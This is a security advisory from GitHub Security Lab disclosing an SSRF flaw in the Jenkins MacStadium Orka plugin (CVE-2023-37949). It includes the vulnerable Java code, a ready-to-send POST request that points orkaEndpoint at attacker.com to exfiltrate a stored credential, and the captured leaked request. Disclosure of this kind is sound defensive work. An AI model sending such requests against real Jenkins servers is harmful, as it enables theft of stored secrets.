Coordinated Disclosure Timeline
- 2023-04-13: Issue reported to the Jenkins Security team.
- 2023-07-12: Advisory published (fixed in Orka by MacStadium Plugin 1.34).
Summary
A Server-Side Request Forgery (SSRF) vulnerability in jenkinsci/macstadium-orka-plugin allows the leak of sensitive credentials to an attacker-controlled server. The issue arises from a lack of proper input validation/sanitization of the orkaEndpoint parameter in the OrkaAgent#doFillNodeItems. This method hardcodes an ACL.System access to the credentials storage and leak the secrets to attacker-controlled servers.
Product
macstadium-orka-plugin Jenkins plugin
Tested Version
Details
Arbitrary secret leakage via SSRF (GHSL-2023-066)
The OrkaAgent#doFillNodeItems method reads a credential identified by the orkaCredentialsId query parameter and sends it to the attacker-controlled server specified by the orkaEndpoint query parameter:
@POST
public ListBoxModel doFillNodeItems(@QueryParameter String orkaEndpoint,
@QueryParameter String orkaCredentialsId, @QueryParameter boolean useJenkinsProxySettings,
@QueryParameter boolean ignoreSSLErrors) {
return this.infoHelper.doFillNodeItems(orkaEndpoint, orkaCredentialsId, useJenkinsProxySettings,
ignoreSSLErrors);
}
In order to exploit the vulnerability, the attacker needs to send a request to Jenkins specifying the secret to be read and the server to send it to. For example, to leak the FLAG credential to attacker.com the authenticated attacker would need to send the following request:
POST /jenkins/descriptorByName/io.jenkins.plugins.orka.OrkaAgent/fillNodeItems?orkaEndpoint=https://attacker.com&orkaCredentialsId=FLAG HTTP/1.1
Host: localhost:8080
Connection: close
Content-Length: 0
Note that the attacker does NOT need to be authenticated but in that case, anonymous users need to have Overall/Read permission.
The code responsible to read the arbitrary credentials is:
public static <C extends Credentials> C lookupSystemCredentials(final String credentialsId, final Class<C> type) {
return CredentialsMatchers.firstOrNull(
CredentialsProvider.lookupCredentials(type, Jenkins.get(), ACL.SYSTEM, Collections.emptyList()),
CredentialsMatchers.withId(credentialsId));
}
}
As we can see in the code, regardless of the user privileges, the credentials are read with ACL.SYSTEM permissions.
Once the credentials are retrieved, they are sent back to the attacker-controlled server which will receive the following POST request:
POST /token HTTP/1.1
Content-Type: application/json; charset=utf-8
Content-Length: 44
Host: attacker.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/4.8.0
{"email":"foo","password":"SUPERSECRETFLAG"}
Since the POST request that initiates the SSRF is a simple request, an attacker could embed malicious JavaScript that submits this request on the user’s behalf when the victim visits the malicious page.
This vulnerability was found using CodeQL’s SSRF Java query.
Impact
This vulnerability can lead to sensitive secret credentials leak.
CVE
- CVE-2023-37949
Resources
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-066 in any communication regarding this issue.